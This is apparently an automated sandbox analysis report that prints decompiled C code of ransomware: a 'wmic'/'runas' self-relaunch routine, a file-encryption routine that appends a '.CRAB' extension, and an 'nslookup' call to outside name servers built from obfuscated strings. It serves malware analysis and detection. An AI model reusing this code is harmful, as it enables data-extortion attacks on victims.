d, xrefs: 0FBB46C9
n, xrefs: 0FBB46C1

Memory Dump Source

Source File: 0000000B.00000002.320288020.000000000FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FBB0000, based on PE: true

Associated: 0000000B.00000002.320283406.000000000FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320296152.000000000FBBA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320303150.000000000FBC2000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320307802.000000000FBC4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_fbb0000_wzltxa.jbxd

Yara matches

Similarity

API ID: ConditionMask$Virtual$AllocDirectoryExecuteFreeInfoShellSystemVerifyVersion_memsetlstrcat
String ID: $ $ $ $.$.$/$/$\$\$a$a$a$b$c$d$d$e$e$e$e$h$i$l$l$m$m$m$n$o$open$p$s$s$t$u$w$w$x$x
API String ID: 2684037697-4098772853
Opcode ID: b93e87022c60c3ec84ad45b75faed80bd78f6f8c975f11e3544f8b85bb645f25
Instruction ID: 9c2571b213d6432d9d28e714a34348c99e0a9e9cea64d8813788f5cadd8cb5da
Opcode Fuzzy Hash: b93e87022c60c3ec84ad45b75faed80bd78f6f8c975f11e3544f8b85bb645f25
Instruction Fuzzy Hash: 8A412AB0548380DFE360CF119849B9BBFE6BB85B49F10491CEA985A291C7F6854CCF97

Uniqueness

Uniqueness Score: -1.00%

Function 0FBB3DB0 Relevance: 77.1, APIs: 9, Strings: 35, Instructions: 109
memorysynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0FBB3DB0(void* __ecx, void* __edx, void* __eflags) {
				char _v1020;
				short _v1028;
				char _v1532;
				short _v1540;
				intOrPtr _v1548;
				intOrPtr _v1552;
				intOrPtr _v1556;
				intOrPtr _v1560;
				intOrPtr _v1564;
				intOrPtr _v1568;
				intOrPtr _v1572;
				intOrPtr _v1576;
				intOrPtr _v1580;
				intOrPtr _v1584;
				intOrPtr _v1588;
				intOrPtr _v1592;
				intOrPtr _v1596;
				intOrPtr _v1600;
				intOrPtr _v1604;
				intOrPtr _v1608;
				intOrPtr _v1612;
				intOrPtr _v1616;
				short _v1620;
				intOrPtr _v1624;
				intOrPtr _v1628;
				intOrPtr _v1632;
				intOrPtr _v1636;
				intOrPtr _v1640;
				intOrPtr _v1644;
				intOrPtr _v1648;
				intOrPtr _v1652;
				intOrPtr _v1656;
				intOrPtr _v1660;
				intOrPtr _v1664;
				intOrPtr _v1668;
				intOrPtr _v1672;
				short _v1676;
				char _v1680;
				int _t54;
				struct HWND__* _t62;
				long _t66;
				void* _t76;
				void* _t78;
				void* _t80;

				_t78 = __ecx;
				_t54 = E0FBB3CF0(__edx);
				if(_t54 != 0) {
					_t54 = E0FBB3C70();
					if(_t54 == 0) {
						_v1676 = 0x770025;
						_v1672 = 0x6e0069;
						_v1668 = 0x690064;
						_v1664 = 0x250072;
						_v1660 = 0x73005c;
						_v1656 = 0x730079;
						_v1652 = 0x650074;
						_v1648 = 0x33006d;
						_v1644 = 0x5c0032;
						_v1640 = 0x620077;
						_v1636 = 0x6d0065;
						_v1632 = 0x77005c;
						_v1628 = 0x69006d;
						_v1624 = 0x63;
						ExpandEnvironmentStringsW( &_v1676,  &_v1540, 0xff);
						_v1620 = 0x720070;
						_v1616 = 0x63006f;
						_v1612 = 0x730065;
						_v1608 = 0x200073;
						_v1604 = 0x610063;
						_v1600 = 0x6c006c;
						_v1596 = 0x630020;
						_v1592 = 0x650072;
						_v1588 = 0x740061;
						_v1584 = 0x200065;
						_v1580 = 0x630022;
						_v1576 = 0x64006d;
						_v1572 = 0x2f0020;
						_v1568 = 0x200063;
						_v1564 = 0x740073;
						_v1560 = 0x720061;
						_v1556 = 0x200074;
						_v1552 = 0x730025;
						_v1548 = 0x22;
						wsprintfW( &_v1028,  &_v1620, _t78);
						_t76 = VirtualAlloc(0, 0x3d, 0x3000, 0x40);
						 *_t76 = 0x3c;
						 *(_t76 + 4) = 0x40;
						_t62 = GetForegroundWindow();
						_t80 = 0;
						 *(_t76 + 8) = _t62;
						_v1680 = 0x750072;
						_v1676 = 0x61006e;
						_v1672 = 0x73;
						 *((intOrPtr*)(_t76 + 0xc)) =  &_v1680;
						 *((intOrPtr*)(_t76 + 0x10)) =  &_v1532;
						 *((intOrPtr*)(_t76 + 0x14)) =  &_v1020;
						 *(_t76 + 0x18) = 0;
						 *(_t76 + 0x1c) = 0;
						 *(_t76 + 0x20) = 0;
						while(1) {
							_t66 = ShellExecuteExW(_t76);
							if(_t66 != 0) {
								break;
							}
							_t80 = _t80 + 1;
							if(_t80 < 0x64) {
								continue;
							}
							_t54 = VirtualFree(_t76, _t66, 0x8000);
							goto L6;
						}
						WaitForSingleObject( *(_t76 + 0x38), 0xffffffff);
						CloseHandle( *(_t76 + 0x38));
						ExitProcess(0);
					}
				}
				L6:
				return _t54;
			}

0x0fbb3dbf
0x0fbb3dc1
0x0fbb3dc8
0x0fbb3dce
0x0fbb3dd5
0x0fbb3de7
0x0fbb3df4
0x0fbb3dfd
0x0fbb3e05
0x0fbb3e0d
0x0fbb3e15
0x0fbb3e1d
0x0fbb3e25
0x0fbb3e2d
0x0fbb3e35
0x0fbb3e3d
0x0fbb3e45
0x0fbb3e4d
0x0fbb3e55
0x0fbb3e5d
0x0fbb3e68
0x0fbb3e78
0x0fbb3e81
0x0fbb3e89
0x0fbb3e91
0x0fbb3e99
0x0fbb3ea1
0x0fbb3ea9
0x0fbb3eb1
0x0fbb3eb9
0x0fbb3ec4
0x0fbb3ecf
0x0fbb3eda
0x0fbb3ee5
0x0fbb3ef0
0x0fbb3efb
0x0fbb3f06
0x0fbb3f11
0x0fbb3f1c
0x0fbb3f27
0x0fbb3f41
0x0fbb3f43
0x0fbb3f49
0x0fbb3f50
0x0fbb3f5c
0x0fbb3f5e
0x0fbb3f65
0x0fbb3f6d
0x0fbb3f75
0x0fbb3f7d
0x0fbb3f87
0x0fbb3f91
0x0fbb3f94
0x0fbb3f9b
0x0fbb3fa2
0x0fbb3fb0
0x0fbb3fb1
0x0fbb3fb5
0x00000000
0x00000000
0x0fbb3fb7
0x0fbb3fbb
0x00000000
0x00000000
0x0fbb3fc4
0x00000000
0x0fbb3fc4
0x0fbb3fd6
0x0fbb3fdf
0x0fbb3fe7
0x0fbb3fe7
0x0fbb3dd5
0x0fbb3fca
0x0fbb3fd0

APIs

Part of subcall function 0FBB3CF0: _memset.LIBCMT ref: 0FBB3D42
Part of subcall function 0FBB3CF0: VerSetConditionMask.KERNEL32 ref: 0FBB3D66
Part of subcall function 0FBB3CF0: VerSetConditionMask.KERNEL32 ref: 0FBB3D6A
Part of subcall function 0FBB3CF0: VerSetConditionMask.KERNEL32 ref: 0FBB3D6E
Part of subcall function 0FBB3CF0: VerifyVersionInfoW.KERNEL32(0000011C,00000023,00000000), ref: 0FBB3D95

Part of subcall function 0FBB3C70: AllocateAndInitializeSid.ADVAPI32(00000000,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 0FBB3CA0

ExpandEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0FBB3E5D
wsprintfW.USER32 ref: 0FBB3F27
VirtualAlloc.KERNEL32(00000000,0000003D,00003000,00000040), ref: 0FBB3F3B
GetForegroundWindow.USER32 ref: 0FBB3F50
ShellExecuteExW.SHELL32(00000000), ref: 0FBB3FB1
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0FBB3FC4
WaitForSingleObject.KERNEL32(?,000000FF), ref: 0FBB3FD6
CloseHandle.KERNEL32(?), ref: 0FBB3FDF
ExitProcess.KERNEL32 ref: 0FBB3FE7

Strings

2, xrefs: 0FBB3E2D
a, xrefs: 0FBB3EB1
l, xrefs: 0FBB3E99
s, xrefs: 0FBB3E89
i, xrefs: 0FBB3DF4
e, xrefs: 0FBB3E81
c, xrefs: 0FBB3EE5
", xrefs: 0FBB3EC4
d, xrefs: 0FBB3DFD
p, xrefs: 0FBB3E68
c, xrefs: 0FBB3E55
r, xrefs: 0FBB3E05
\, xrefs: 0FBB3E45
c, xrefs: 0FBB3E91
t, xrefs: 0FBB3F06
s, xrefs: 0FBB3EF0
%, xrefs: 0FBB3F11
s, xrefs: 0FBB3F75
e, xrefs: 0FBB3EB9
\, xrefs: 0FBB3E0D
%, xrefs: 0FBB3DE7
, xrefs: 0FBB3EDA
w, xrefs: 0FBB3E35
r, xrefs: 0FBB3F65
m, xrefs: 0FBB3E25
, xrefs: 0FBB3EA1
r, xrefs: 0FBB3EA9
", xrefs: 0FBB3F1C
t, xrefs: 0FBB3E1D
o, xrefs: 0FBB3E78
e, xrefs: 0FBB3E3D
m, xrefs: 0FBB3ECF
n, xrefs: 0FBB3F6D
y, xrefs: 0FBB3E15
a, xrefs: 0FBB3EFB

Memory Dump Source

Source File: 0000000B.00000002.320288020.000000000FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FBB0000, based on PE: true

Associated: 0000000B.00000002.320283406.000000000FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320296152.000000000FBBA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320303150.000000000FBC2000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320307802.000000000FBC4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_fbb0000_wzltxa.jbxd

Yara matches

Similarity

API ID: ConditionMask$Virtual$AllocAllocateCloseEnvironmentExecuteExitExpandForegroundFreeHandleInfoInitializeObjectProcessShellSingleStringsVerifyVersionWaitWindow_memsetwsprintf
String ID: $ $"$"$%$%$2$\$\$a$a$c$c$c$d$e$e$e$i$l$m$m$n$o$p$r$r$r$s$s$s$t$t$w$y
API String ID: 561366689-3790645798
Opcode ID: cd75ebcb3e96e70f40612d9b8f8369e8293a1d616ef6b8b941073d7bc391fb49
Instruction ID: 62795232cbc195567a1adfa6db74cebc4de3d7da612a5e5bdd627a7983a22e6f
Opcode Fuzzy Hash: cd75ebcb3e96e70f40612d9b8f8369e8293a1d616ef6b8b941073d7bc391fb49
Instruction Fuzzy Hash: 585168B0408340DFE3208F51D448B9ABFF9FF85759F004A1DEA989A251D7FA9158CF92

Uniqueness

Uniqueness Score: -1.00%

Function 0FBB37B0 Relevance: 66.8, APIs: 32, Strings: 6, Instructions: 320
memorystringwindowCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E0FBB37B0(WCHAR* __ecx, void* __edx, void* __eflags) {
				long _v8;
				void* _v12;
				long _v16;
				long _v20;
				void* _v24;
				void* _v28;
				long _v32;
				long _v36;
				void _v40;
				void _v44;
				signed int _v48;
				WCHAR* _v52;
				WCHAR* _v56;
				void* _v60;
				void* _v64;
				void* _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				short _v80;
				int _v84;
				char _v88;
				char _v104;
				char _v108;
				char _v140;
				char _v388;
				void* _t96;
				void* _t97;
				struct HWND__* _t99;
				void* _t101;
				void* _t107;
				long _t124;
				long _t125;
				long _t128;
				WCHAR* _t145;
				void* _t147;
				void* _t149;
				void* _t151;
				WCHAR* _t162;
				void* _t163;
				void* _t164;
				void _t165;
				void* _t166;
				long _t168;
				void* _t173;
				void* _t175;
				void* _t176;
				void* _t177;

				_t145 = __ecx;
				_t166 = __edx;
				_v52 = __ecx;
				SetFileAttributesW(_t145, GetFileAttributesW(__ecx) & 0xfffffffe);
				_v20 = 0;
				_v32 = 0;
				_t151 = _t166;
				E0FBB6500(_t151, 0, 0,  &_v20,  &_v32);
				_t162 = VirtualAlloc(0, 0x401, 0x3000, 0x40);
				_v80 = 0x43002e;
				_v56 = _t162;
				_v76 = 0x410052;
				_v72 = 0x42;
				lstrcpyW(_t162, _t145);
				lstrcatW(_t162,  &_v80);
				asm("movdqa xmm0, [0xfbc0530]");
				asm("movdqu [ebp-0x88], xmm0");
				_push(_t151);
				asm("movdqa xmm0, [0xfbc0530]");
				asm("movdqu [ebp-0x78], xmm0");
				_v108 = 0;
				asm("movdqa xmm0, [0xfbc0530]");
				asm("movdqu [ebp-0x64], xmm0");
				E0FBB8400( &_v104, 0x10);
				E0FBB8400( &_v140, 0x20);
				_t96 = VirtualAlloc(0, 0x800, 0x3000, 4);
				asm("movdqu xmm0, [ebp-0x88]");
				asm("movdqu [ebx], xmm0");
				asm("movdqu xmm0, [ebp-0x78]");
				_v24 = _t96;
				asm("movdqu [ebx+0x10], xmm0");
				_t97 = VirtualAlloc(0, 0x800, 0x3000, 4);
				asm("movdqu xmm0, [ebp-0x64]");
				_t163 = _t97;
				_v60 = _t163;
				asm("movdqu [edi], xmm0");
				_v88 = 0x20;
				_v84 = 0x10;
				_t99 = E0FBB6660(_v20, _v32, _t96,  &_v88, 0x800);
				_t175 = _t173 + 0x18;
				if(_t99 != 0) {
					_t101 = E0FBB6660(_v20, _v32, _t163,  &_v84, 0x800);
					_t176 = _t175 + 0x14;
					if(_t101 != 0) {
						E0FBB8520( &_v140,  &_v388);
						_t177 = _t176 + 8;
						_t147 = CreateFileW(_v52, 0xc0000000, 1, 0, 3, 0x80, 0);
						_v28 = _t147;
						if(_t147 != 0xffffffff) {
							_t164 = VirtualAlloc(0, 8, 0x3000, 4);
							 *_t164 = 0;
							 *(_t164 + 4) = 0;
							_t107 = VirtualAlloc(0, 0x100001, 0x3000, 4);
							_t168 = 0;
							_v12 = _t107;
							_v36 = 0;
							while(ReadFile(_t147, _t107, 0x100000,  &_v8, 0) != 0) {
								_t124 = _v8;
								if(_t124 != 0) {
									_t149 = 0;
									_v64 = 0;
									_t168 =  <  ? 1 : _t168;
									 *_t164 =  *_t164 + _t124;
									asm("adc [edi+0x4], ebx");
									_t125 = _v8;
									_v48 = _t125;
									if((_t125 & 0x0000000f) != 0) {
										do {
											_t125 = _t125 + 1;
										} while ((_t125 & 0x0000000f) != 0);
										_v8 = _t125;
									}
									_v68 = VirtualAlloc(0, _t125, 0x3000, 4);
									E0FBB8B20(_t126, _v12, _v48);
									_t128 = _v8;
									_t177 = _t177 + 0xc;
									_v40 = _t128;
									if(VirtualAlloc(0, _t128, 0x3000, 4) != 0) {
										E0FBB36D0(_v68, _v40,  &_v64,  &_v388,  &_v104, _t129);
										_t149 = _v64;
										_t177 = _t177 + 0x10;
									}
									VirtualFree(_v68, 0, 0x8000);
									SetFilePointer(_v28,  ~_v48, 0, 1);
									if(WriteFile(_v28, _t149, _v8,  &_v16, 0) == 0) {
										_t168 = 1;
										_v36 = 1;
									}
									VirtualFree(_t149, 0, 0x8000);
									_t147 = _v28;
									if(_t168 == 0) {
										_t107 = _v12;
										continue;
									}
								}
								break;
							}
							VirtualFree(_v12, 0, 0x8000);
							if(_v36 == 0) {
								WriteFile(_t147, _v24, 0x100,  &_v16, 0);
								WriteFile(_t147, _v60, 0x100,  &_v16, 0);
								WriteFile(_t147, _t164, 0x10,  &_v16, 0);
							}
							CloseHandle(_t147);
							_v40 =  *_t164;
							VirtualFree(_t164, 0, 0x8000);
							VirtualFree(_v24, 0, 0x8000);
							VirtualFree(_v60, 0, 0x8000);
							if(_v36 == 0) {
								MoveFileW(_v52, _v56);
							}
							_t165 = _v40;
						} else {
							VirtualFree(_t163, 0, 0x8000);
							VirtualFree(_v24, 0, 0x8000);
							asm("xorps xmm0, xmm0");
							asm("movlpd [ebp-0x28], xmm0");
							_t165 = _v44;
						}
					} else {
						GetLastError();
						asm("xorps xmm0, xmm0");
						asm("movlpd [ebp-0x28], xmm0");
						_t165 = _v44;
					}
				} else {
					MessageBoxA(_t99, "Fatal error: rsaenh.dll is not initialized as well", "Fatal error", 0x10);
					asm("xorps xmm0, xmm0");
					asm("movlpd [ebp-0x28], xmm0");
					_t165 = _v44;
				}
				VirtualFree(_v56, 0, 0x8000);
				return _t165;
			}

0x0fbb37bb
0x0fbb37bd
0x0fbb37c1
0x0fbb37cf
0x0fbb37d8
0x0fbb37e3
0x0fbb37ef
0x0fbb37f1
0x0fbb380c
0x0fbb380e
0x0fbb3817
0x0fbb381a
0x0fbb3821
0x0fbb3828
0x0fbb3833
0x0fbb3839
0x0fbb3846
0x0fbb384e
0x0fbb384f
0x0fbb385a
0x0fbb385f
0x0fbb3863
0x0fbb386b
0x0fbb3870
0x0fbb3880
0x0fbb3896
0x0fbb3898
0x0fbb38ae
0x0fbb38b4
0x0fbb38b9
0x0fbb38bc
0x0fbb38c1
0x0fbb38c3
0x0fbb38c8
0x0fbb38d3
0x0fbb38d6
0x0fbb38da
0x0fbb38e1
0x0fbb38ef
0x0fbb38f4
0x0fbb38f9
0x0fbb3937
0x0fbb393c
0x0fbb3941
0x0fbb3970
0x0fbb3975
0x0fbb3993
0x0fbb3995
0x0fbb399b
0x0fbb39db
0x0fbb39e9
0x0fbb39ef
0x0fbb39f6
0x0fbb39f8
0x0fbb39fa
0x0fbb39fd
0x0fbb3a05
0x0fbb3a20
0x0fbb3a25
0x0fbb3a2b
0x0fbb3a37
0x0fbb3a3a
0x0fbb3a3d
0x0fbb3a3f
0x0fbb3a42
0x0fbb3a45
0x0fbb3a4a
0x0fbb3a50
0x0fbb3a50
0x0fbb3a51
0x0fbb3a55
0x0fbb3a55
0x0fbb3a6b
0x0fbb3a72
0x0fbb3a77
0x0fbb3a7a
0x0fbb3a7d
0x0fbb3a92
0x0fbb3aaa
0x0fbb3aaf
0x0fbb3ab2
0x0fbb3ab2
0x0fbb3abf
0x0fbb3ad2
0x0fbb3aed
0x0fbb3aef
0x0fbb3af4
0x0fbb3af4
0x0fbb3aff
0x0fbb3b05
0x0fbb3b0a
0x0fbb3a02
0x00000000
0x0fbb3a02
0x0fbb3b0a
0x00000000
0x0fbb3a25
0x0fbb3b20
0x0fbb3b26
0x0fbb3b37
0x0fbb3b4c
0x0fbb3b5c
0x0fbb3b5c
0x0fbb3b63
0x0fbb3b76
0x0fbb3b79
0x0fbb3b85
0x0fbb3b91
0x0fbb3b97
0x0fbb3b9f
0x0fbb3b9f
0x0fbb3ba5
0x0fbb399d
0x0fbb39ab
0x0fbb39b7
0x0fbb39b9
0x0fbb39bc
0x0fbb39c4
0x0fbb39c4
0x0fbb3943
0x0fbb3943
0x0fbb394f
0x0fbb3952
0x0fbb395a
0x0fbb395a
0x0fbb38fb
0x0fbb3908
0x0fbb3914
0x0fbb3917
0x0fbb391f
0x0fbb391f
0x0fbb3bb2
0x0fbb3bbe

APIs

GetFileAttributesW.KERNEL32(00000000,00000010,00000000,00000000), ref: 0FBB37C4
SetFileAttributesW.KERNEL32(00000000,00000000), ref: 0FBB37CF
VirtualAlloc.KERNEL32(00000000,00000401,00003000,00000040,00000000,00000000,00000000,?), ref: 0FBB380A
lstrcpyW.KERNEL32 ref: 0FBB3828
lstrcatW.KERNEL32 ref: 0FBB3833

Part of subcall function 0FBB8400: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 0FBB8420
Part of subcall function 0FBB8400: VirtualAlloc.KERNEL32(00000000,00000007,00003000,00000040), ref: 0FBB8448
Part of subcall function 0FBB8400: GetModuleHandleA.KERNEL32(?), ref: 0FBB849D
Part of subcall function 0FBB8400: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 0FBB84AB
Part of subcall function 0FBB8400: GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 0FBB84BA
Part of subcall function 0FBB8400: CryptReleaseContext.ADVAPI32(?,00000000), ref: 0FBB84DE
Part of subcall function 0FBB8400: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0FBB84EC

Part of subcall function 0FBB8400: CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0FBB292B), ref: 0FBB8500
Part of subcall function 0FBB8400: VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,?,0FBB292B), ref: 0FBB850E

VirtualAlloc.KERNEL32(00000000,00000800,00003000,00000004), ref: 0FBB3896
VirtualAlloc.KERNEL32(00000000,00000800,00003000,00000004), ref: 0FBB38C1

Part of subcall function 0FBB6660: EnterCriticalSection.KERNEL32(0FBC2A48,?,0FBB38F4,00000000,00000000,00000000,?,00000800), ref: 0FBB666B
Part of subcall function 0FBB6660: CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,F0000000,?,0FBB38F4,00000000,00000000,00000000), ref: 0FBB6691
Part of subcall function 0FBB6660: GetLastError.KERNEL32(?,0FBB38F4,00000000,00000000,00000000), ref: 0FBB669B
Part of subcall function 0FBB6660: CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008,?,0FBB38F4,00000000,00000000,00000000), ref: 0FBB66B7

MessageBoxA.USER32 ref: 0FBB3908
GetLastError.KERNEL32 ref: 0FBB3943
VirtualFree.KERNEL32(?,00000000,00008000), ref: 0FBB3BB2

Strings

Fatal error, xrefs: 0FBB38FD
R, xrefs: 0FBB381A
., xrefs: 0FBB380E
B, xrefs: 0FBB3821
, xrefs: 0FBB38DA
Fatal error: rsaenh.dll is not initialized as well, xrefs: 0FBB3902

Memory Dump Source

Source File: 0000000B.00000002.320288020.000000000FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FBB0000, based on PE: true

Associated: 0000000B.00000002.320283406.000000000FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320296152.000000000FBBA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320303150.000000000FBC2000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320307802.000000000FBC4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_fbb0000_wzltxa.jbxd

Yara matches

Similarity

API ID: Virtual$ContextCrypt$Alloc$AcquireFree$AttributesErrorFileLastRelease$AddressCriticalEnterHandleLibraryLoadMessageModuleProcSectionlstrcatlstrcpy
String ID: $.$B$Fatal error$Fatal error: rsaenh.dll is not initialized as well$R
API String ID: 1177701972-4284454829
Opcode ID: f35214e4a612cb066850913c47227ef25d1deb1ea7996798d1c3d066222b8aa8
Instruction ID: 36ea86b6a4136745f8c9800807d7b712a6d1202ff4db4a9840a9e8b821f3c888
Opcode Fuzzy Hash: f35214e4a612cb066850913c47227ef25d1deb1ea7996798d1c3d066222b8aa8
Instruction Fuzzy Hash: 8CC13D71E40309ABEB219BA4DC46FEEBBB8FF08711F204155FA40BA181DBF469558F54

Uniqueness

Uniqueness Score: -1.00%

Function 0FBB5060 Relevance: 61.4, APIs: 8, Strings: 27, Instructions: 118
pipememoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0FBB5060(CHAR* __ecx, void* __edx, WCHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				short _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				char _v72;
				short _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				char _v128;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t43;
				void* _t55;
				CHAR* _t62;
				void* _t64;

				_v72 = 0x73006e;
				_t55 = __edx;
				_v20 = 0;
				_t62 = __ecx;
				_v76 = 0;
				_v68 = 0x6f006c;
				_t41 =  !=  ?  &_v128 :  &_v72;
				_v64 = 0x6b006f;
				_a4 =  !=  ?  &_v128 :  &_v72;
				_v60 = 0x700075;
				_v56 = 0x250020;
				_v52 = 0x200053;
				_v48 = 0x73006e;
				_v44 = 0x2e0031;
				_v40 = 0x690076;
				_v36 = 0x6d0072;
				_v32 = 0x630061;
				_v28 = 0x2e0068;
				_v24 = 0x750072;
				_v128 = 0x73006e;
				_v124 = 0x6f006c;
				_v120 = 0x6b006f;
				_v116 = 0x700075;
				_v112 = 0x250020;
				_v108 = 0x200053;
				_v104 = 0x73006e;
				_v100 = 0x2e0032;
				_v96 = 0x690076;
				_v92 = 0x6d0072;
				_v88 = 0x630061;
				_v84 = 0x2e0068;
				_v80 = 0x750072;
				_v16.nLength = 0xc;
				_v16.bInheritHandle = 1;
				_v16.lpSecurityDescriptor = 0;
				_t43 = CreatePipe(0xfbc2a70, 0xfbc2a6c,  &_v16, 0);
				if(_t43 != 0) {
					_t43 = SetHandleInformation( *0xfbc2a70, 1, 0);
					if(_t43 == 0) {
						goto L1;
					} else {
						CreatePipe(0xfbc2a68, 0xfbc2a74,  &_v16, 0);
						_t43 = SetHandleInformation( *0xfbc2a74, 1, 0);
						if(_t43 == 0) {
							goto L1;
						} else {
							_t64 = VirtualAlloc(0, 0x2800, 0x3000, 4);
							if(_t64 == 0) {
								lstrcpyA(_t62, "fabian wosar <3");
								return 0;
							} else {
								wsprintfW(_t64, _a4, _t55);
								E0FBB4E10(_t64);
								E0FBB4FB0(_t55, _t62, _t55, _t62, _t64);
								VirtualFree(_t64, 0, 0x8000);
								return 0;
							}
						}
					}
				} else {
					L1:
					return _t43 | 0xffffffff;
				}
			}

0x0fbb506d
0x0fbb5078
0x0fbb507b
0x0fbb507f
0x0fbb5081
0x0fbb508b
0x0fbb5092
0x0fbb5095
0x0fbb509e
0x0fbb50af
0x0fbb50b6
0x0fbb50bd
0x0fbb50c4
0x0fbb50cb
0x0fbb50d2
0x0fbb50d9
0x0fbb50e0
0x0fbb50e7
0x0fbb50ee
0x0fbb50f5
0x0fbb50fc
0x0fbb5103
0x0fbb510a
0x0fbb5111
0x0fbb5118
0x0fbb511f
0x0fbb5126
0x0fbb512d
0x0fbb5134
0x0fbb513b
0x0fbb5142
0x0fbb5149
0x0fbb5150
0x0fbb5157
0x0fbb515e
0x0fbb5165
0x0fbb516d
0x0fbb5189
0x0fbb518d
0x00000000
0x0fbb518f
0x0fbb519f
0x0fbb51af
0x0fbb51b3
0x00000000
0x0fbb51b5
0x0fbb51c9
0x0fbb51cd
0x0fbb520a
0x0fbb5218
0x0fbb51cf
0x0fbb51d4
0x0fbb51df
0x0fbb51e8
0x0fbb51f5
0x0fbb5203
0x0fbb5203
0x0fbb51cd
0x0fbb51b3
0x0fbb516f
0x0fbb516f
0x0fbb5178
0x0fbb5178

APIs

CreatePipe.KERNEL32(0FBC2A70,0FBC2A6C,?,00000000,00000001,00000001,00000000), ref: 0FBB5165
SetHandleInformation.KERNEL32(00000001,00000000), ref: 0FBB5189
CreatePipe.KERNEL32(0FBC2A68,0FBC2A74,0000000C,00000000), ref: 0FBB519F
SetHandleInformation.KERNEL32(00000001,00000000), ref: 0FBB51AF
VirtualAlloc.KERNEL32(00000000,00002800,00003000,00000004), ref: 0FBB51C3
wsprintfW.USER32 ref: 0FBB51D4
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0FBB51F5

Strings

l, xrefs: 0FBB508B
, xrefs: 0FBB50B6
v, xrefs: 0FBB512D
, xrefs: 0FBB5111
S, xrefs: 0FBB5118
r, xrefs: 0FBB5149
n, xrefs: 0FBB511F
1, xrefs: 0FBB50CB
r, xrefs: 0FBB50EE
o, xrefs: 0FBB5103
a, xrefs: 0FBB513B
2, xrefs: 0FBB5126
a, xrefs: 0FBB50E0
r, xrefs: 0FBB50D9
l, xrefs: 0FBB50FC
n, xrefs: 0FBB506D
h, xrefs: 0FBB5142
fabian wosar <3, xrefs: 0FBB5204
r, xrefs: 0FBB5134
o, xrefs: 0FBB5095
n, xrefs: 0FBB50F5
n, xrefs: 0FBB50C4
v, xrefs: 0FBB50D2
u, xrefs: 0FBB510A
h, xrefs: 0FBB50E7
u, xrefs: 0FBB50AF
S, xrefs: 0FBB50BD

Memory Dump Source

Source File: 0000000B.00000002.320288020.000000000FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FBB0000, based on PE: true

Associated: 0000000B.00000002.320283406.000000000FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320296152.000000000FBBA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320303150.000000000FBC2000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320307802.000000000FBC4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_fbb0000_wzltxa.jbxd

Yara matches

Similarity

API ID: CreateHandleInformationPipeVirtual$AllocFreewsprintf
String ID: $ $1$2$S$S$a$a$fabian wosar <3$h$h$l$l$n$n$n$n$o$o$r$r$r$r$u$u$v$v
API String ID: 1490407255-3072057902
Opcode ID: 4c6ea4709e3373fb6058f8490859ca85a6befc8a4ea807f7a4f4db018ac47591
Instruction ID: bc2920e67383321a1e7120325f6a5341f6e0df091b09c43d36c21db5198a0dde
Opcode Fuzzy Hash: 4c6ea4709e3373fb6058f8490859ca85a6befc8a4ea807f7a4f4db018ac47591
Instruction Fuzzy Hash: 29416F70E40308ABEB20CF95EC497EEBFB5FB04755F104159E904AB282C7FA45598F94

Uniqueness

Uniqueness Score: -1.00%

